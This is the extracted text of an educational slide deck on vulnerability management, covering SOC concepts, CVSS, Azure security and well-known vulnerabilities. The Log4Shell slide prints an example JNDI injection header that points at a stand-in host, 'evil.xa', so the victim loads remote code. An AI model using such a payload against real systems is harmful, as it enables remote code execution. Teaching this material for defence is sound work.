Vulnerability Management

by Christopher Nett
Connect with me!

Get discounted courses, updates and industry insights Social Media

My Website LinkedIn

Azure Newsletter X

Cybersecurity Newsletter Bluesky

Threads

Christopher Nett
It is a complex world we live in

Networks
IoT

ICS & OT
Cloud
Mobile Devices

People
Servers
Endpoints

Christopher Nett
Cyber Security Challenges

Lack of Many Noisy alerts

Lack of
Security disconnected and false
Automation
People products positives

A lot of alerts
More Overwhelming Evolving
are never
sophisticated access to regulatory
really
threats data landscape
investigated

Christopher Nett
What is a Security Operations Center (SOC)?

Threat
Threat Hunting Log Management
Intelligence

Reducing Attack
SOC Analysts Threat Detection
Surface

Root cause Recovery and Incident

investigation Remediation Response

Christopher Nett Source: What is a security operations center (SOC)? | Microsoft Security
 SOC Model

Tier 3 • Proactive Threat Hunting

5% of Alerts
• Advanced Forensics

• Advanced malware
Tier 2 • Hard tasks
25% of Alerts

• Commodity malware
Tier 1 70% of Alerts
• Easier tasks that can or should not be automated

• Commodity malware
Automation • Repetitive Tasks
• Mimics the steps an analyst would take in easy cases

Christopher Nett Source: What is a security operations center (SOC)? | Microsoft Security
 Cyber Security Incident Response Process

Containment,
Detection & Post-Incident
Preparation Eradication &
Analysis Activity
Recovery

NIST 800-61: Computer Security Incident Handling Guide

Christopher Nett Source: Computer Security Incident Handling Guide (nist.gov)

EDR, XDR, SIEM & SOAR

• Endpoint Detection and Response Defender for

EDR Behavior monitoring for endpoints
• Endpoint

• Extended Detection and Response Defender XDR

XDR • Behavior monitoring beyond the endpoint Defender for Cloud

• Security Information & Event Management

SIEM Sentinel
• Centralized collection, correlation and analysis of logs

• Security Orchestration, Automation & Response Sentinel +

SOAR
• Automates incident response procedures Azure Logic Apps

Christopher Nett Source: What is a security operations center (SOC)? | Microsoft Security
Blue and Red Teaming

Security Vulnerability
Monitoring Assessments

Penetration
Incident Response Testing

Forensics Social Engineering

Simulate
Threat Hunting adversary TTPs

Christopher Nett
Purple Teaming

Blue and Red collaborate to improve security posture

Collaborative simulation of adversary TTPs

Drastic upskilling of both teams

Christopher Nett
What is a Threat?

Any circumstance or event with the potential to adversely impact

organizational operations, organizational assets, or individuals through
an information system via unauthorized access, destruction, disclosure,
modification of information, and/or denial of service.

Christopher Nett Source: Security and Privacy Controls for Information Systems and Organizations (nist.gov)
Intelligence, Threat Intelligence and CTI

Intelligence
Threat Intelligence
Cyber Threat Intelligence

Christopher Nett Source: What is Cyber Threat Intelligence? (cisecurity.org)

Cyber Threat Intelligence (CTI)

What is Cyber Threat Intelligence?

“Cyber Threat intelligence is knowledge about adversaries and their
motivations, intentions, and methods that is collected, analyzed, and
disseminated in ways that help security and business staff at all levels
protect critical assets of the enterprise.”

Enabling Threat-Informed-Defense

Christopher Nett Source: What is Cyber Threat Intelligence? (cisecurity.org)

Threat, Vulnerability & Risk

Initiates Exploits Causing Adverse

Threat Actor Threat Vulnerability
Impact

Producing

Risk

Impact + Likelihood

Christopher Nett Source: Security and Privacy Controls for Information Systems and Organizations (nist.gov)
Threat-Informed-Defense

• What is the mission of my organization?

• What threat actors are interested in my organizations industry?
• What are the motivations of those threat actors?
• What TTPs are those threat actors using?
• How can I detect and protect my organization against those TTPs?

Christopher Nett
Tactics, Techniques and Procedures

• Tactics: The high-level description of the behavior and Reconnaissance

strategy of a threat actor.
• Techniques: These are the non-specific guidelines and
intermediate methods that describe how a tactic action Scanning
can be realized.
• Procedures: These refer to the sequence of actions
performed using a technique to execute on an attack
Vulnerability Scanning
tactic. The procedure involves detailed descriptions
activities.

Christopher Nett Source: What Are TTPs? Tactics, Techniques & Procedures Explained | Splunk
IOCs and IOAs

• IOC: An Indicator of Compromise (IOC) is evidence on a system that

indicates that the security of the network has been breached.
• IOA: Indicators of attack (IOA) focus on detecting the intent of what
an attacker is trying to accomplish and its behavior, regardless of the
malware or exploit used in an attack.

IOCs IOAs

File Hashes, Domains, URLs Intent & Behavior

Christopher Nett Source: IOA vs IOC: Understanding the Differences - CrowdStrike

Pyramid of Pain

TTPs Tough!

Tools Challenging

Network/
Annoying
Level of Host Artifacts
difficulty
Domain Names Simple

IP Addresses Easy

Hash Values Trivial

Christopher Nett Source: Enterprise Detection & Response: The Pyramid of Pain (detect-respond.blogspot.com)
What is Threat Hunting?

Threat Hunting is the practice of proactively searching for cyber

threats that are lurking undetected in your environment.
There are two Threat Hunting Models:
1) Intelligence-based Hunting: Leverage IOCs, hash values, IP
addresses, domain names or host artifacts
2) Hypothesis-based Hunting: Hunt based on IOAs and TTPs of
adversaries

Christopher Nett Source: What is threat hunting? | IBM)

CTI Sources

Enterprise OSINT Social Media

Christopher Nett
What is Zero Trust?

• Zero Trust is a security strategy

• It is not a product or a service

There are 3 core principles of Zero Trust:

1) Verify explicitly
2) Use least-privilege access
3) Assume breach

Christopher Nett Source: Zero Trust Model - Modern Security Architecture | Microsoft Security
The Microsoft Security Cosmos

Microsoft Sentinel | Copilot for Security

Multi-cloud
On-Premises

Identities Endpoints Apps SQL Server Containers

VMs

Email Docs Cloud Network Industrial PaaS

apps traffic IoT services

Microsoft Defender XDR Defender for Cloud

Christopher Nett Source: Microsoft Cybersecurity Reference Architectures (MCRA) | Microsoft Learn
 Defending Across Attack Chains
Entra ID Protection

Brute Force or Steal Data Exfiltration

Credentials
Phishing
Mail

Open Compromised Compromised

Click URL attachment Privileged Account Domain

Command and Compromised Lateral

Installation Exploitation Control Account Movement

Defender for
Defender for Office 365 Defender for Endpoint Defender for Identity Cloud Apps

Defender XDR
Sentinel
Copilot for Security

Christopher Nett Source: Microsoft Cybersecurity Reference Architectures (MCRA) | Microsoft Learn
Cloud Computing Properties

• On-demand self service

• Broad network access
• Resource pooling
• Rapid elastic
• Measured service

Christopher Nett Source: nistspecialpublication800-145.pdf

Public, Private, Multi & Hybrid Cloud
Microsoft Amazon Google

Public
Cloud Multi Cloud

Azure
AWS GCP

Hybrid Cloud

Private
Cloud

AWS Google
Azure Stack
Outposts Anthos

Christopher Nett Source: nistspecialpublication800-145.pdf

Azure Global Backbone

130k+ 172+ 500+ 20k+

60+
Azure miles of fiber + Network network peering
regions subsea cables Edge sites partners connections

Christopher Nett Source: Global Network – Backbone Networking Infrastructure | Microsoft Azure
Shared Responsibility in Azure
Responsibility On-prem IaaS PaaS SaaS

Information and Data

Devices (Mobile and PCs)

Accounts and Identities

Identity and Directory Infrastructure

Applications

Network Controls

Operating System

Physical Hosts

Physical Network

Physical Datacenter

Christopher Nett Source: Shared responsibility in the cloud - Microsoft Azure | Microsoft Learn
Azure Subscription Types

Free Student Pay As You Go Enterprise

Agreement

• Free credits for 30 • Free credits for 12 • Pay for what you • One consumption
days months use agreement for all
• Some services are • No credit card • Credit card Azure services
free for 12 months required required • Various different
billing models

Christopher Nett Source: Create Your Azure Free Account Today | Microsoft Azure
Entra ID Tenants and Azure Subscriptions

Entra ID Tenant Azure

Identities access resources

Identities

Christopher Nett Source: Microsoft Entra ID documentation - Microsoft Entra ID | Microsoft Learn
Azure Resource Hierarchy

Management Groups

Subscriptions

Resource Groups

Resources
Christopher Nett
What is a Vulnerability?

Weakness in an information system, system security procedures,

internal controls, or implementation that could be exploited or triggered
by a threat source.

Christopher Nett Source: vulnerability - Glossary | CSRC (nist.gov)

Common Vulnerabilities and Exposures (CVE)

• Led by MITRE
• Every newly discovered vulnerability is assigned a CVE ID in the form
of CVE-yyyy-xxxx
• Includes a vulnerability description, data sources as well as the official
vendor announcement

Christopher Nett
Common Vulnerabilities and Exposures (CVE)

• CVE-2009-2935
• Google V8, as used in Google Chrome before 2.0.172.43, allows
remote attackers to bypass intended restrictions on reading memory,
and possibly obtain sensitive information or execute arbitrary code in
the Chrome sandbox, via crafted JavaScript.
• CVSS Version 2.0 Score: 10.0

Christopher Nett https://nvd.nist.gov/vuln/detail/CVE-2009-2935

Common Vulnerability Scoring System (CVSS)

• Evaluates the severity of the vulnerability from 1-10

• Considers the CIA triad but also other factors

CVSSv2 CVSSv3
CVSS Score Severity CVSS Score Severity
7.0 – 10.0 High 9.0 – 10.0 Critical
4.0 – 6.9 Medium 7.0 – 8.9 High
0.0 – 3.9 Low 4.0 – 6.9 Medium
0.1 – 3.9 Low
0 None
Christopher Nett Source: https://nvd.nist.gov/vuln-metrics/cvss
Where can Vulnerabilities occur?

Applications

Middleware

Operating System Adversary

Hardware

Christopher Nett
Zero Days

Zero Day Vulnerability Public Vulnerability

Time

Discovery Exploitation Disclosure Mitigation

Christopher Nett
Zero Days

• Zero Day Researchers

• Nation States leverage Zero Days extensively
• There is a market for Zero Days
• Zero Days are heavily used in big campaigns, e.g. Stuxnet (4 Zero
Days)

Christopher Nett
Outdated Software

• Outdated software is still one of the most common vulnerabilities

• Can be a combination of various types of vulnerabilities
• Vulnerable Systems even though a patch is available

Exploit

Threat Actor Windows Server 2008

Christopher Nett
Cloud Misconfigurations

• Usually not a CVE but a critical misconfiguration leading to a

vulnerability that can be exploited by adversaries

Read/Write Public AWS S3 Bucket

Threat Actor
Public Azure Storage Account

Christopher Nett
Remote Code Execution

• RCE is when an adversary can exploit systems remotely

• The only requirement is to have connectivity to the vulnerable system

On-Premises Datacenter

Remote Code Execution

Threat Actor Windows Server Windows Server

Windows Server Windows Server

Christopher Nett
Overview

Applications
Heartbleed

Middleware Log4Shell

Operating System EternalBlue Adversary

Hardware
Meltdown

Christopher Nett
Heartbleed

• CVE-2014-0160
• CVSS 3.1 Score: 7.5
• The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before
1.0.1g do not properly handle Heartbeat Extension packets.
• This allows remote attackers to obtain sensitive information from
process memory via crafted packets that trigger a buffer over-read,
as demonstrated by reading private keys, related to d1_both.c and
t1_lib.c, aka the Heartbleed bug.

Christopher Nett Source: https://nvd.nist.gov/vuln/detail/cve-2014-0160

Heartbleed

User Bob has

Server, send me this 5 letter word if you are there: connected. User
“Alice” Bob wants 5
letters : Alice.
Server master
Alice key is
Bob 216351235.

Server, send me this 500 letter word if you are User Bob has
there: connected. User
“Alice” Bob wants 5
letters : Alice.
Server master
Alice. Server master key is 216351235.
key is
Bob
216351235.

Christopher Nett
Log4Shell

• CVE-2021-44228
• Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2,
2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and
parameters do not protect against attacker controlled LDAP and other JNDI
related endpoints.
• An attacker who can control log messages or log message parameters can
execute arbitrary code loaded from LDAP servers when message lookup
substitution is enabled. From log4j 2.15.0, this behavior has been disabled by
default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality
has been completely removed. Note that this vulnerability is specific to log4j-core
and does not affect log4net, log4cxx, or other Apache Logging Services
projects.
• CVSSv3 Score: 10.0

Christopher Nett Source: https://nvd.nist.gov/vuln/detail/CVE-2021-44228

Log4Shell

GET /test HTTP/1.1

Host: victim.xa
User-Agent: ${jndi:ldap://evil.xa/x} ${jndi:ldap://evil.xa/x} ldap://evil.xa/x

Adversary inserts JNDI Log4j interpolates the

String is passed to string and queries the
lookup in a header field
that is likely to be logged log4j for logging malicious LDAP server

Adversary Vulnerable Vulnerable Log4j Malicious LDAP

Server Server
http://victim.xa ldap://evil.xa

Java downloads the malicious LDAP servers responds with

Java class and executes it directory information that
contains the malicious Java class
public class Malicious implements Serializable {
…
static {
<malicious Java code>
}
}
MS17-010 / EternalBlue

• Zero day that was developed by the NSA

• Shadow Brokers stole the exploit from the NSA
• After NSA discovered the theft, they informed Microsoft, and a patch
was released
• Shadow Brokers tried to sell the vulnerability but eventually made it
public
• EternalBlue was leveraged in WannaCry and NotPetya

Christopher Nett Source: https://nvd.nist.gov/vuln/detail/cve-2017-0144

MS17-010 / EternalBlue

• CVE-2017-0144
• CVSS 3.1 Score: 8.1
• The SMBv1 server in Microsoft Windows Vista SP2; Windows Server
2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server
2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and
1607; and Windows Server 2016.
• It allows remote attackers to execute arbitrary code via crafted
packets, aka "Windows SMB Remote Code Execution Vulnerability."

Christopher Nett Source: https://nvd.nist.gov/vuln/detail/cve-2017-0144

EternalBlue / MS17-010

RCE: Payload containing the BufferOverflow

Reverse Shell Opens

Adversary SMB1
TCP/IP 445

Christopher Nett
Meltdown

• CVE-2017-5754
• CVSS 3.1 Score: 5.6
• Systems with microprocessors utilizing speculative execution and
indirect branch prediction may allow unauthorized disclosure of
information to an attacker with local user access via a side-channel
analysis of the data cache.
• Intel x86 microprocessors, IBM POWER processors, and some ARM-
based microprocessors

Christopher Nett Source: https://nvd.nist.gov/vuln/detail/CVE-2017-5754

 Meltdown
How reading from memory should work: How Intel processors “optimized” performance:

Does the application have permission to read

from this address? Read from memory

Does the application have permission to read

Read from memory
from this address?

By masking exceptions and using

a side channel that times how
long it takes to read from
memory, meltdown can steal
secret data

Christopher Nett Source: https://spectrum.ieee.org/how-the-spectre-and-meltdown-hacks-really-worked

What is Vulnerability Management?

• Identification: Detecting vulnerabilities in IT assets like applications, systems,

and networks through automated scanning and manual testing methods.
• Evaluation: Analyzing identified vulnerabilities to assess their nature,
exploitability, and potential impact on the organization.
• Prioritization: Ranking vulnerabilities based on their criticality and the urgency of
action needed, considering factors such as threat environment and asset value.
• Remediation: Addressing vulnerabilities by applying patches, configuring
security settings, or employing other mitigation strategies to reduce risk.
• Reporting: Documenting the vulnerability management process, outcomes, and
unresolved issues for internal stakeholders and compliance with external
regulations.

Christopher Nett
 Identification

Vulnerability Identification Reporting Evaluation

Remediation Prioritization

• Scanning Tools: Utilize automated software tools to scan for

vulnerabilities across all digital assets
• Agent-based
• Agent-less

• Manual Testing: Conduct expert-driven assessments and penetration

testing to find security gaps missed by automated tools
• Inventory Management: Maintain an updated inventory of all
organizational assets to ensure comprehensive vulnerability detection

Christopher Nett
 Identification

Vulnerability Evaluation Reporting Evaluation

Remediation Prioritization

• Severity Assessment: Assess vulnerabilities based on the potential

harm they could cause if exploited.
• CVSS
• Asset Criticality

• Context Analysis: Consider the specific context of the asset, such as

its role in the organization and exposure level.
• Vulnerability Research: Stay informed about the latest vulnerability
disclosures and industry advisories

Christopher Nett
 Identification

Vulnerability Prioritization Reporting Evaluation

Remediation Prioritization

• Risk-Based Ranking: Prioritize fixing vulnerabilities based on the risk

they pose to the most critical assets.
• Compliance Requirements: Factor in legal and compliance
implications to prioritize vulnerabilities.
• Resource Availability: Align vulnerability remediation with available
security resources and operational impact.

Christopher Nett
 Identification

Vulnerability Remediation Reporting Evaluation

Remediation Prioritization

• Patch Management: Deploy security patches promptly to mitigate

identified vulnerabilities.
• Configuration Changes: Adjust settings and configurations to harden
systems against attack.
• Mitigation Techniques: Implement interim protective measures when
immediate remediation is not possible.

Christopher Nett
 Identification

Reporting Reporting Evaluation

Remediation Prioritization

• Documentation: Record details of the vulnerability management

efforts, including identified, mitigated, and outstanding vulnerabilities.
• Review Meetings: Regularly review the vulnerability management
process with stakeholders to align on progress and strategy.
• Compliance Auditing: Prepare reports for auditing purposes to ensure
compliance with industry regulations and standards.

Christopher Nett
Vulnerability Management Architecture

Reporting
Scan Remediation

Agent-less Vulnerability Cloud Resources

Scanners

Scan Remediation

Agent-based Vulnerability
IT Operations
Scanners

On-premises Resources

Scan Remediation

Employee Devices

Christopher Nett Evaluate & Prioritize

Scenario

• Imagine you are the CISO at EnergyCorp, one of the largest energy
providers in your country.
• EnergyCorp has recently experienced a series of cyber attacks that
exposed vulnerabilities in its IT infrastructure, affecting both its
operations and reputation.
• The company realized the need to establish a robust vulnerability
management program to identify, assess, prioritize, and remediate
vulnerabilities before they could be exploited by malicious actors.

Christopher Nett
Scenario

The main challenges faced by EnergyCorp included:

• Lack of visibility into the organization's digital assets and their associated
vulnerabilities.
• Inefficient vulnerability assessment processes that were largely manual and
time-consuming.
• Prioritization of vulnerabilities not aligned with the business impact, leading
to delayed remediation of critical vulnerabilities.
• Limited collaboration between IT, security, and operational teams.
• Inadequate reporting and tracking mechanisms for vulnerability management
efforts.

Christopher Nett
Steps

1. Define Strategic Goals

2. Identify Vulnerability Management Requirements
3. Establish Processes and Tools
4. Establish Vulnerability Management Architecture
5. Continuous Improvement

Christopher Nett
Define Strategic Goals

• Ensure Business Continuity: Minimize downtime due to security breaches.

• Protect Sensitive Data: Safeguard critical business and customer data from
unauthorized access.
• Compliance with Regulations: Ensure adherence to industry standards and
regulations such as GDPR, HIPAA, etc.
• Reputation Management: Maintain customer trust by proving resilience to
cyber threats.
• Risk Management: Identify and manage security risks to an acceptable level.

Christopher Nett
Identify Vulnerability Management Requirements

• Asset Discovery: Automatically catalog digital assets and their

configurations.
• Vulnerability Scanning: Utilize automated tools to scan for known
vulnerabilities.
• Risk Assessment: Develop criteria for evaluating the risk level of identified
vulnerabilities.
• Patch Management: Implement procedures for timely application of security
patches.
• Threat Intelligence Integration: Leverage external threat data to anticipate
emerging risks.

Christopher Nett
Establish Processes and Tools

• Selection of Tools: Choose comprehensive vulnerability management

tools for automation.
• Process Development: Create standardized processes for
vulnerability detection, assessment, and remediation.
• Roles and Responsibilities: Define clear roles for the IT, security, and
operations teams regarding vulnerability management.
• Training: Provide training for relevant staff on vulnerability
management processes and tools.

Christopher Nett
Establish Vulnerability Management Architecture

• Centralized Dashboard: Implement a centralized management

dashboard for visibility and control.
• Integration with existing systems: Ensure new tools integrate well
with the existing IT infrastructure.
• Scalability: Design the architecture to handle an increasing number of
assets and vulnerabilities.
• Redundancy and Failover: Establish systems that can take over in
case of failure to ensure continuous operation.

Christopher Nett
Continuous Improvement

• Feedback Loops: Implement feedback mechanisms to learn from past

incidents and improve processes.
• Regular Audits and Assessments: Schedule regular security audits to test
the effectiveness of the vulnerability management program.
• Update and Review Policies: Continually review and update vulnerability
management policies to adapt to new threats.
• Performance Metrics: Establish KPIs for measuring the effectiveness of the
vulnerability management process.
• Stakeholder Engagement: Keep stakeholders informed about the status of
vulnerability management efforts and involve them in decision-making.

Christopher Nett
Scenario

• EnergyCorp wants to leverage Azure native security tools to enable

their vulnerability management program
• You are tasked with:
• Ensuring that all Azure assets are scanned for vulnerabilities
• Vulnerability scanning shall be conducted agent-based and agentless
• Creating a vulnerability report for the Azure environment

Christopher Nett
Agent-based Vulnerability Scanning for VMs

• Requires Defender for Servers Plan Azure Defender for

Subscription Cloud
• Available for Azure VMs and Arc-
enabled machines VM with Defender
for Servers Plan

Vulnerability Display CVEs

Scan

Christopher Nett Source: Enable vulnerability scanning with the integrated Qualys scanner - Microsoft Defender for Cloud | Microsoft Learn
Agentless Vulnerability Scanning for VMs

Isolated
• Requires Defender CSPM or Customer Scanning Defender for
Defender for Servers Plan 2 Environment Environment Cloud

• Available for Azure, AWS and GCP

• Zero Performance Impact

Vulnerability Display
Scan CVEs
Disk
Snapshot

Christopher Nett Source: Learn about agentless scanning for VMs - Microsoft Defender for Cloud | Microsoft Learn